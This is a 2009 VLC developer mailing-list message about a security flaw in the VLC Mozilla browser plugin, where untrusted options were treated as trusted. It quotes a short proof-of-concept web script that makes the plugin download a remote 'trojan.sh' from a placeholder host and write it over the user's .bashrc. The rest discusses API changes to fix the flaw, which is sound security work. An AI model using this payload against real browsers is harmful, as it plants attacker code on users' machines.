[vlc-devel] Regarding the seemingly still "obscure" security problem
Laurent Aimar
fenrir at via.ecp.fr
Sun Jan 18 15:21:31 CET 2009
On Sat, Jan 17, 2009, Rémi Denis-Courmont wrote:
> Le samedi 17 janvier 2009 17:34:04 Jean-Baptiste Kempf, vous avez écrit :
> > On Sat, Jan 17, 2009 at 03:26:25PM +0200, Rémi Denis-Courmont wrote :
> > > <script type="text/javascript"><!--
> > > var vlc = document.getElementById("vlc");
> > > var src = "http/dump://www.example.com/trojan.sh";
> > > var dst = ".bashrc";
> > > vlc.playlist.add (src, "File", ":demuxdump-file=" + dst);
> > > vlc.playlist.play ();
> > > //!--></script>
> > > </body>
> > > </html>
> >
> > I think this was brought to attention during the summit.
> >
> > One question is: could we, in the plugin call add( ),
> > detect demuxdump, sout and file-logging options and in that case,
> > warn the user that some file will be overwritten?
>
> The core has had safe and unsafe options for this purpose for a year already.
> The stupid Mozilla plugin (and perhaps others) is obviously not setting the
> trusted flag properly.
I have changed playlist API to make sure you have to manually specify
VLC_INPUT_OPTION_TRUSTED
to have an option trusted.
The libvlc API exposes only two functions that force VLC_INPUT_OPTION_TRUSTED:
- libvlc_media_add_option
- libvlc_playlist_add_extended
The mozilla plugin is using libvlc_playlist_add_extended :(
The problem I see is that libvlc API has no way to add options without
making them trusted.
So libvlc need a new version which will not make options trusted of
libvlc_media_add_option and libvlc_playlist_add_extended.
Then the mozilla plugin must be updated to use them.
--
fenrir
More information about the vlc-devel
mailing list